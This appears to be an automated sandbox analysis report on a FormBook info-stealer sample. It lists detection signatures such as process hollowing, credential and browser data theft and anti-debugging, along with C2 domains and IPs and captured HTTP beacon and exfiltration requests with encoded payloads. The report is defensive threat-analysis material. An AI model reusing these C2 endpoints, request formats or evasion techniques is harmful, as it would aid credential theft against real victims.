Windows Analysis Report
PrWP76ejHO.exe

Overview

General Information

Sample Name: PrWP76ejHO.exe
Analysis ID: 756343
MD5: db102a67350060a1e967aef81118f18d
SHA1: a3131a3df17a154e41c09973ca8a9aabac29929e
SHA256: 98420cf47e19574739cff3f1f74bd3c6c70e103d0b28040b64fd3c77588c7ee7
Tags: 32exeFormbooktrojan
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses ipconfig to lookup or modify the Windows network settings
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to read the clipboard data
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: PrWP76ejHO.exe ReversingLabs: Detection: 73%
Source: PrWP76ejHO.exe Virustotal: Detection: 32% Perma Link
Yara detected FormBook
Source: Yara match File source: 3.2.iscan.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.iscan.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: www.fedefarmatour.online/dwdp/ Avira URL Cloud: Label: malware
Source: http://www.t4yfrance.com/dwdp/ Avira URL Cloud: Label: malware
Source: http://www.a8-group.com/dwdp/ Avira URL Cloud: Label: malware
Source: http://www.fedefarmatour.online/dwdp/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: inhomeyoga.com Virustotal: Detection: 11% Perma Link
Source: t4yfrance.com Virustotal: Detection: 8% Perma Link
Source: fedefarmatour.online Virustotal: Detection: 14% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\iscan.exe ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe ReversingLabs: Detection: 26%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe Joe Sandbox ML: detected
Source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.fedefarmatour.online/dwdp/"]}
Uses 32bit PE files
Source: PrWP76ejHO.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Binary string: ipconfig.pdb source: iscan.exe, 00000003.00000002.359559716.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, iscan.exe, 00000003.00000002.359328170.0000000000767000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ipconfig.pdbGCTL source: iscan.exe, 00000003.00000002.359559716.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, iscan.exe, 00000003.00000002.359328170.0000000000767000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: iscan.exe, 00000001.00000003.250447257.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, iscan.exe, 00000001.00000003.251103890.0000000002A70000.00000004.00001000.00020000.00000000.sdmp, iscan.exe, 00000003.00000003.252292538.00000000005D0000.00000004.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000002.360968796.0000000000B1F000.00000040.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000003.253843942.000000000086B000.00000004.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000002.359594597.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000002.511826936.0000000002EEF000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000002.510619896.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000003.357567203.00000000004E8000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: iscan.exe, iscan.exe, 00000003.00000003.252292538.00000000005D0000.00000004.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000002.360968796.0000000000B1F000.00000040.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000003.253843942.000000000086B000.00000004.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000002.359594597.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000002.511826936.0000000002EEF000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000002.510619896.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000003.357567203.00000000004E8000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\PrWP76ejHO.exe Code function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00405620
Source: C:\Users\user\Desktop\PrWP76ejHO.exe Code function: 0_2_00405FF6 FindFirstFileA,FindClose, 0_2_00405FF6
Source: C:\Users\user\Desktop\PrWP76ejHO.exe Code function: 0_2_00402654 FindFirstFileA, 0_2_00402654
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 1_2_00410310 FindFirstFileExW, 1_2_00410310

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.fedefarmatour.online
Source: C:\Windows\explorer.exe Domain query: www.a8-group.com
Source: C:\Windows\explorer.exe Network Connect: 50.87.143.200 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.t4yfrance.com
Source: C:\Windows\explorer.exe Domain query: www.inhomeyoga.com
Source: C:\Windows\explorer.exe Network Connect: 195.110.124.133 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 194.58.112.174 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 81.88.48.71 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.fedefarmatour.online/dwdp/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: REGISTER-ASIT REGISTER-ASIT
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /dwdp/?DDK8=DL0dq8Xp&THg8gZ=as8dBOCYMIlGkdFtu6bNi6R+poUd8qernbVKNux/Lg6XWSTTcIv/9iufEycx+V+hXMP21oAGdeFqW0RuMIySji5bX/9mKLXNqQ== HTTP/1.1Host: www.inhomeyoga.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /dwdp/?THg8gZ=o99SD4CnjZ1qu7iTZtFfc7Nx3UYgSJ0Ur2vCMIrwN9S0TIs4+nDL6lw5CChyhzqrvnlUg4IJDbpF+LHriFN/RsV5sIy/QX8aQA==&DDK8=DL0dq8Xp HTTP/1.1Host: www.fedefarmatour.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /dwdp/?DDK8=DL0dq8Xp&THg8gZ=NWgjuoil9S/+22DuNJW9gHFfRnzyfGvnsPD5fu3f3YQDroVAltOshqAP1UOAIJ0eSwU/Ico7U9Xz8hxCOYRKQwl8NX3l5SYpCA== HTTP/1.1Host: www.t4yfrance.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /dwdp/?THg8gZ=DSbK0Z5FDwQug92xqW96a+2ughsfKsmWbm0zJjXp1SGH3e562FU2SdtvukdrkYmM3MO1KHWCknXXR+yfUTM1LtpOX41OHf8llQ==&DDK8=DL0dq8Xp HTTP/1.1Host: www.a8-group.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 195.110.124.133 195.110.124.133
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /dwdp/ HTTP/1.1Host: www.fedefarmatour.onlineConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.fedefarmatour.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.fedefarmatour.online/dwdp/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 48 67 38 67 5a 3d 6c 5f 56 79 41 4a 4b 57 6d 35 4a 64 6a 61 6d 7a 5a 34 63 63 52 76 46 56 28 51 77 74 64 72 38 62 74 55 71 38 50 61 76 72 4e 66 75 47 49 61 46 64 33 57 62 35 78 6b 56 50 43 53 4e 4c 31 44 36 73 74 55 4a 38 68 71 4d 53 49 61 64 66 7a 63 61 62 6a 45 59 34 4f 38 56 5a 36 6f 65 77 61 57 46 63 4d 31 6b 41 4f 33 78 6d 63 5f 67 6a 4d 38 77 66 77 6e 32 6e 6b 46 6f 4a 4d 51 43 49 39 71 36 4a 48 67 51 38 7e 50 61 6e 72 33 43 63 35 41 30 77 67 77 7e 47 64 79 79 71 73 73 62 4d 30 67 75 38 41 6b 34 2d 53 6c 4c 5f 7a 67 6b 4e 77 38 65 5f 4c 42 78 4c 4e 37 6c 32 66 63 6f 59 37 41 38 65 7e 7a 34 44 59 4c 69 33 67 4f 32 74 4a 66 4b 73 5a 4e 7a 46 4b 63 36 67 53 6a 30 6a 42 38 31 47 48 36 58 58 4c 48 53 51 74 6e 64 54 38 48 53 6c 70 67 5a 42 31 34 66 2d 56 55 67 49 35 5a 48 71 77 48 6d 61 4f 57 32 41 45 4c 34 6b 49 76 4f 6e 69 48 72 51 32 74 77 6a 4a 6f 5a 76 5a 4d 76 48 67 6f 61 69 54 59 67 65 7e 70 28 53 43 4e 33 74 35 30 69 45 52 77 49 6b 78 4a 55 66 28 6c 4a 5a 38 57 28 79 36 2d 7a 51 38 31 36 41 50 66 52 7a 42 69 49 34 69 68 51 67 39 66 76 79 79 76 56 6d 6b 4c 76 32 73 74 71 37 53 64 37 32 28 77 28 30 5a 6e 53 6e 5a 76 6f 4e 64 79 74 75 6b 47 4f 45 64 63 51 34 55 46 39 37 57 4f 6e 71 77 71 4e 73 42 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: THg8gZ=l_VyAJKWm5JdjamzZ4ccRvFV(Qwtdr8btUq8PavrNfuGIaFd3Wb5xkVPCSNL1D6stUJ8hqMSIadfzcabjEY4O8VZ6oewaWFcM1kAO3xmc_gjM8wfwn2nkFoJMQCI9q6JHgQ8~Panr3Cc5A0wgw~GdyyqssbM0gu8Ak4-SlL_zgkNw8e_LBxLN7l2fcoY7A8e~z4DYLi3gO2tJfKsZNzFKc6gSj0jB81GH6XXLHSQtndT8HSlpgZB14f-VUgI5ZHqwHmaOW2AEL4kIvOniHrQ2twjJoZvZMvHgoaiTYge~p(SCN3t50iERwIkxJUf(lJZ8W(y6-zQ816APfRzBiI4ihQg9fvyyvVmkLv2stq7Sd72(w(0ZnSnZvoNdytukGOEdcQ4UF97WOnqwqNsBA).
Source: global traffic HTTP traffic detected: POST /dwdp/ HTTP/1.1Host: www.fedefarmatour.onlineConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.fedefarmatour.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.fedefarmatour.online/dwdp/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 48 67 38 67 5a 3d 6c 5f 56 79 41 4a 4b 57 6d 35 4a 64 6a 70 7e 7a 5a 4a 63 63 65 5f 46 56 6a 67 77 52 64 72 38 63 74 55 71 34 50 66 66 37 4d 74 4f 47 49 72 31 64 33 6b 44 35 38 45 56 4f 4a 79 4e 50 71 54 37 30 74 55 4a 57 68 71 77 53 49 61 4a 66 7a 5a 65 62 6a 33 77 5f 50 38 56 62 38 6f 65 7a 65 57 45 47 4d 31 35 4a 4f 32 4e 6d 63 35 73 6a 4d 4e 77 66 78 31 75 6b 7a 6c 6f 49 53 41 43 46 7a 4b 37 49 48 67 51 43 7e 50 61 4e 72 79 65 63 35 78 45 77 68 54 47 46 49 69 79 76 76 73 62 59 7a 78 54 43 46 56 67 32 64 32 76 76 79 32 5a 65 7e 2d 58 36 52 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: THg8gZ=l_VyAJKWm5Jdjp~zZJcce_FVjgwRdr8ctUq4Pff7MtOGIr1d3kD58EVOJyNPqT70tUJWhqwSIaJfzZebj3w_P8Vb8oezeWEGM15JO2Nmc5sjMNwfx1ukzloISACFzK7IHgQC~PaNryec5xEwhTGFIiyvvsbYzxTCFVg2d2vvy2Ze~-X6RQ).
Source: global traffic HTTP traffic detected: POST /dwdp/ HTTP/1.1Host: www.fedefarmatour.onlineConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.fedefarmatour.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.fedefarmatour.online/dwdp/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 48 67 38 67 5a 3d 6c 5f 56 79 41 4a 4b 57 6d 35 4a 64 73 6f 4f 7a 59 6f 63 63 53 50 46 57 36 51 77 52 54 4c 38 59 74 55 32 34 50 61 76 72 4e 65 69 47 49 63 5a 64 32 47 62 35 77 6b 56 4f 4e 43 4e 4c 31 44 36 74 74 56 73 6e 68 71 41 6f 49 63 5a 66 68 37 6d 62 6a 58 77 34 51 4d 56 57 37 6f 65 77 54 32 45 47 4d 31 31 5f 4f 30 6c 32 63 35 6b 6a 4d 2d 34 66 78 33 32 6e 7a 31 6f 4a 4e 51 43 46 7a 4c 47 47 48 67 51 6f 7e 50 43 64 72 78 47 63 34 6a 73 77 74 68 7e 47 42 53 79 6f 73 73 62 47 36 41 69 67 41 6b 30 71 53 6e 58 76 7a 6a 41 4e 7e 38 65 5f 4f 48 6c 4c 58 4c 6c 4a 61 63 6f 62 37 41 67 67 7e 7a 67 44 59 4f 4b 42 67 37 79 74 62 72 75 73 50 34 6e 47 46 4d 36 69 61 44 30 38 4c 63 78 56 48 36 6e 54 4c 47 4b 51 73 56 52 54 39 77 7e 6c 6c 6d 4e 42 77 59 66 79 56 55 67 35 6d 4a 4b 49 77 44 7e 30 4f 57 57 41 45 63 59 6b 4a 38 6d 6e 6c 30 7a 51 34 39 77 62 50 6f 5a 62 4d 63 76 6e 67 6f 54 38 54 62 68 42 7e 70 7a 53 4d 39 48 74 28 67 4f 46 56 67 49 67 78 4a 56 54 28 6c 4a 72 38 57 4b 4a 36 37 32 6e 38 46 47 41 4f 59 39 7a 41 78 67 34 67 78 51 6c 34 66 76 7a 79 76 59 79 6b 4c 7a 59 73 73 71 37 53 4f 37 32 28 7a 33 30 59 55 36 6e 57 50 6f 32 4a 69 73 5a 67 48 71 4f 56 76 41 48 66 6a 4a 2d 51 62 7e 4f 6d 65 51 72 56 50 48 56 4e 41 33 55 75 76 51 52 6b 74 43 51 66 70 6a 36 57 30 78 50 6a 62 78 39 67 77 64 46 48 41 28 64 47 6b 64 51 62 46 51 68 56 73 6b 53 61 4e 37 74 55 42 44 36 76 34 48 54 36 63 6b 4b 4c 64 70 49 65 31 51 79 44 68 78 31 48 75 78 43 76 52 6a 63 28 66 4d 49 78 67 72 39 6d 4e 6f 54 58 50 32 32 7a 54 6f 71 69 72 4c 4f 6d 55 6f 56 41 68 54 6f 30 6d 37 42 71 34 77 6c 70 79 6d 5a 53 54 58 42 77 6f 61 5a 4e 32 33 43 70 54 31 39 42 7a 53 32 36 72 61 73 7e 38 61 4a 43 39 64 73 53 62 46 33 6e 69 7e 61 46 41 71 61 68 6f 30 36 58 69 75 50 6e 75 4f 50 56 58 64 4f 79 42 39 41 28 38 52 2d 32 49 39 57 4d 58 32 6d 4b 5f 69 4b 72 6e 42 55 48 37 77 69 37 6f 38 42 7a 6a 36 65 45 32 6a 46 6f 42 51 59 74 52 71 48 67 5a 33 4f 7e 61 50 53 68 73 54 43 50 59 55 6c 4d 73 59 56 6c 4b 42 56 68 36 63 51 43 48 32 4d 70 44 59 49 43 76 37 5f 48 47 4b 49 56 37 4b 62 38 53 67 77 4a 63 4d 75 63 75 6d 39 35 49 78 4f 77 41 75 46 51 31 57 58 7e 69 58 67 62 39 44 42 58 72 36 30 33 4d 33 48 77 66 77 62 72 51 56 48 47 42 59 4c 7e 51 31 30 48 38 67 32 34 38 4b 76 4f 4c 4b 74 37 5f 75 6f 6c 6b 4c 4a 76 31 5a 68 55 56 6a 55 76 32 7a 30 32 30 4e 73 4b 38 49 57 6a 31 56 63 46 35 66 76 72 74 4e 69 53 6f 30 6e 76 56 30 55 47 70 68 47 31 5a 67 74 78 2d 38 6d 54 54 7a 46 72 46 49 6b 4b 6f 76 79 39 53 53 4e 70 71 6e 44 52 37 57 56 54 6d 41 75 56 66 70 39 46 76 77 55 6c 47 4f 7
Source: global traffic HTTP traffic detected: POST /dwdp/ HTTP/1.1Host: www.t4yfrance.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.t4yfrance.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.t4yfrance.com/dwdp/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 48 67 38 67 5a 3d 41 55 49 44 74 64 4f 6e 28 46 54 77 78 78 72 49 62 76 44 30 68 32 78 30 53 7a 6e 56 66 47 4c 51 30 61 36 50 62 65 44 5f 35 4c 30 2d 78 4c 59 65 75 4c 48 4e 6f 36 67 71 38 69 54 47 49 35 74 72 50 78 67 71 52 36 30 6d 54 71 72 38 6b 68 78 4a 41 6f 73 36 51 57 39 57 50 6e 33 6c 6d 53 38 35 4c 73 70 4d 31 35 55 7a 49 6d 35 63 56 79 69 69 66 4a 70 4f 44 33 68 42 32 48 68 77 57 75 49 31 4c 4c 67 49 78 69 79 52 6b 70 74 33 33 34 69 35 36 75 28 54 6e 52 51 49 33 4a 31 42 62 56 4e 4d 66 78 7e 37 35 6a 52 69 31 38 78 75 48 69 43 6a 33 50 48 55 48 33 4f 30 4c 6e 52 6b 5a 31 5a 47 42 50 68 6b 52 6b 6d 4c 64 69 65 70 39 6b 57 43 4a 52 35 49 49 64 51 77 63 4b 77 5a 52 57 79 58 58 70 72 34 63 7a 6d 55 44 47 6b 6c 70 7a 34 32 44 6b 70 49 71 79 73 5f 73 31 39 31 7e 41 6a 43 34 48 4b 79 57 79 75 72 74 55 46 62 49 50 32 5a 71 54 49 51 44 4f 6d 34 45 30 32 4e 77 6a 47 56 63 31 59 45 4e 51 45 54 6f 30 77 79 63 4c 7e 42 6b 4c 5a 30 6d 6c 65 51 44 4e 75 53 37 58 69 55 79 76 39 43 6b 39 73 70 71 66 74 58 50 6b 73 6e 6b 2d 71 30 54 45 42 4f 4b 4d 32 5f 56 76 68 2d 6f 6c 33 6e 70 71 32 61 59 35 71 42 42 48 63 6e 5a 2d 70 51 54 34 42 45 45 62 5a 7a 70 6f 4b 76 36 70 43 4d 76 66 55 6a 56 4a 54 34 6a 6f 6d 33 67 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: THg8gZ=AUIDtdOn(FTwxxrIbvD0h2x0SznVfGLQ0a6PbeD_5L0-xLYeuLHNo6gq8iTGI5trPxgqR60mTqr8khxJAos6QW9WPn3lmS85LspM15UzIm5cVyiifJpOD3hB2HhwWuI1LLgIxiyRkpt334i56u(TnRQI3J1BbVNMfx~75jRi18xuHiCj3PHUH3O0LnRkZ1ZGBPhkRkmLdiep9kWCJR5IIdQwcKwZRWyXXpr4czmUDGklpz42DkpIqys_s191~AjC4HKyWyurtUFbIP2ZqTIQDOm4E02NwjGVc1YENQETo0wycL~BkLZ0mleQDNuS7XiUyv9Ck9spqftXPksnk-q0TEBOKM2_Vvh-ol3npq2aY5qBBHcnZ-pQT4BEEbZzpoKv6pCMvfUjVJT4jom3gA).
Source: global traffic HTTP traffic detected: POST /dwdp/ HTTP/1.1Host: www.t4yfrance.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.t4yfrance.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.t4yfrance.com/dwdp/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 48 67 38 67 5a 3d 41 55 49 44 74 64 4f 6e 28 46 54 77 32 47 48 49 61 38 72 30 70 57 78 30 51 7a 6e 58 66 47 4c 58 30 61 36 4c 62 66 57 69 7e 38 51 2d 78 36 6f 65 74 39 37 4e 76 36 67 74 6f 53 53 42 4d 35 74 2d 50 78 68 42 52 2d 30 6d 54 75 4c 38 6b 67 42 4a 41 62 30 39 54 57 39 75 4e 6e 33 6d 78 43 38 57 4c 74 46 69 31 37 51 7a 49 6c 52 63 56 44 69 69 65 63 64 4e 47 58 68 41 71 58 68 4e 63 4f 49 70 4c 4c 67 32 78 69 79 33 6b 71 56 33 33 49 79 35 36 4d 58 51 74 52 51 4e 6f 35 30 78 61 58 4e 43 54 79 47 6b 78 31 74 5f 30 4d 41 4c 4d 69 72 57 71 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: THg8gZ=AUIDtdOn(FTw2GHIa8r0pWx0QznXfGLX0a6LbfWi~8Q-x6oet97Nv6gtoSSBM5t-PxhBR-0mTuL8kgBJAb09TW9uNn3mxC8WLtFi17QzIlRcVDiiecdNGXhAqXhNcOIpLLg2xiy3kqV33Iy56MXQtRQNo50xaXNCTyGkx1t_0MALMirWqg).
Source: global traffic HTTP traffic detected: POST /dwdp/ HTTP/1.1Host: www.t4yfrance.comConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.t4yfrance.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.t4yfrance.com/dwdp/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 48 67 38 67 5a 3d 41 55 49 44 74 64 4f 6e 28 46 54 77 77 6d 58 49 59 66 44 30 72 32 78 33 56 7a 6e 58 52 6d 4c 54 30 61 7e 4c 62 65 44 5f 35 4a 41 2d 78 4a 51 65 74 62 48 4e 70 36 67 74 28 69 54 47 49 35 74 73 50 77 45 36 52 36 77 51 54 73 6e 38 69 6d 4e 4a 57 4c 30 36 4d 6d 39 56 4d 6e 33 6c 38 69 38 57 4c 73 35 45 31 35 35 4d 49 6b 70 63 56 32 75 69 65 5a 70 4f 4a 6e 68 42 31 48 68 4e 63 4f 55 32 4c 4c 68 42 78 6a 61 6e 6b 71 31 33 32 61 36 35 35 64 58 54 37 78 51 4b 33 4a 31 78 66 56 41 30 66 78 79 76 35 6d 78 79 31 37 78 75 41 43 43 6a 30 4d 76 55 51 6e 4f 39 48 48 52 6e 5a 31 46 38 42 4d 52 6b 52 68 50 30 64 52 4f 70 73 30 47 43 5a 6a 68 4c 48 4e 51 32 54 71 77 77 62 32 7e 49 58 70 37 43 63 32 4b 55 44 58 41 6c 70 45 55 32 45 47 78 49 75 53 74 32 73 31 39 36 6a 77 28 6c 34 48 57 49 57 7a 4f 72 74 6a 74 62 49 59 79 5a 6e 45 63 51 65 4f 6d 36 54 6b 32 44 37 44 48 69 63 31 41 55 4e 54 45 36 6f 7a 49 79 63 61 4f 42 67 59 42 7a 32 46 65 63 44 4e 75 46 37 58 6a 6e 79 76 4a 53 6b 38 63 54 71 76 68 58 4d 6e 30 6e 6b 4e 79 30 4e 6b 42 50 50 4d 32 69 56 76 73 65 6f 6c 72 42 70 72 32 61 59 4a 53 42 42 45 45 6e 59 64 78 51 49 49 42 5f 64 72 59 47 75 70 36 67 34 36 32 5a 72 75 55 76 64 65 53 63 71 35 28 6d 69 4c 41 6b 41 6f 34 76 37 4b 4f 4f 37 31 44 6a 6e 73 46 56 4f 53 6b 34 35 43 6d 30 4a 7a 4e 31 28 7a 49 6a 31 69 35 33 52 43 51 33 68 5a 30 2d 64 78 72 51 28 73 35 4e 6f 77 7a 79 56 4d 49 32 4a 46 62 53 4d 6c 77 36 49 65 47 57 55 2d 6a 41 61 65 4c 75 6c 35 5a 65 6d 56 73 53 59 6f 6f 67 59 38 7a 51 45 6b 6c 42 32 43 71 6b 38 35 71 61 6d 72 4f 63 6c 4d 77 54 73 68 58 32 68 48 6c 6b 43 63 6d 77 53 51 6c 74 4e 36 6a 6b 7e 68 36 35 37 77 62 36 53 73 73 43 28 66 35 50 43 61 57 79 46 51 4d 6a 39 49 73 78 4c 4a 68 36 47 55 37 5a 52 59 73 4b 74 35 51 55 45 54 64 77 6a 35 44 44 39 70 73 4b 35 6d 69 50 6a 6f 7a 49 38 54 59 59 64 70 49 71 31 46 76 56 61 39 30 6a 68 6d 37 74 79 52 28 62 36 75 6c 49 62 39 54 76 44 36 39 30 30 45 6b 70 43 6a 73 53 44 73 57 78 49 78 66 34 30 58 63 4f 4d 61 5a 73 6a 79 61 4b 37 50 7e 6f 6e 72 53 6b 6d 43 78 43 6c 46 56 68 39 33 39 55 51 42 4a 4f 4f 72 41 57 51 65 79 6f 43 38 5a 41 28 79 6d 39 53 35 53 47 56 38 78 33 62 48 46 59 62 44 6c 39 4e 58 47 49 38 6c 4a 4a 76 5a 50 47 79 52 7e 4f 65 35 52 49 37 50 43 42 45 30 68 43 41 4e 45 7a 75 72 38 57 36 4f 63 39 49 59 65 36 71 57 44 75 6e 49 32 73 56 43 68 32 71 75 31 34 74 6f 7a 57 51 59 39 33 39 70 56 71 57 35 48 56 4f 41 58 33 61 44 4d 54 64 30 6d 65 30 4f 68 6b 61 76 7e 56 32 44 4b 35 6d 58 6d 45 38 50 58 63 76 4b 7a 6c 32 6a 65 52 73 55 71 76 47 51 49 6d 42 65 33 65 69 58 44 65 34 66 4
Source: global traffic HTTP traffic detected: POST /dwdp/ HTTP/1.1Host: www.a8-group.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.a8-group.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.a8-group.com/dwdp/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 48 67 38 67 5a 3d 4f 51 7a 71 33 76 46 44 65 68 4e 39 6a 2d 65 35 67 6d 31 5a 57 71 6d 51 76 67 77 48 4e 35 53 67 62 6b 38 7a 44 41 48 50 37 54 6d 74 35 74 49 5a 79 56 4d 6e 64 73 46 5f 68 68 67 76 6f 70 6e 39 7e 64 54 4c 4d 30 79 78 6b 55 33 6a 51 4d 57 75 50 41 70 55 54 4e 64 4e 47 64 51 48 48 74 49 4a 73 56 76 4d 4b 34 73 71 34 5a 38 71 28 76 56 72 4c 36 53 31 31 47 53 43 58 44 77 33 50 30 55 61 39 36 37 57 47 65 4d 38 28 43 72 44 47 4e 57 50 36 37 56 5f 71 73 4f 47 32 37 4c 6f 6b 73 67 32 4b 70 45 47 47 48 4c 71 41 72 75 48 47 45 38 42 47 51 64 4c 7e 51 35 56 75 7a 6b 76 66 65 59 49 35 4f 65 6d 5a 46 42 38 71 4b 48 64 4b 53 4f 32 58 73 28 41 50 38 70 4b 44 42 62 62 58 65 4a 55 34 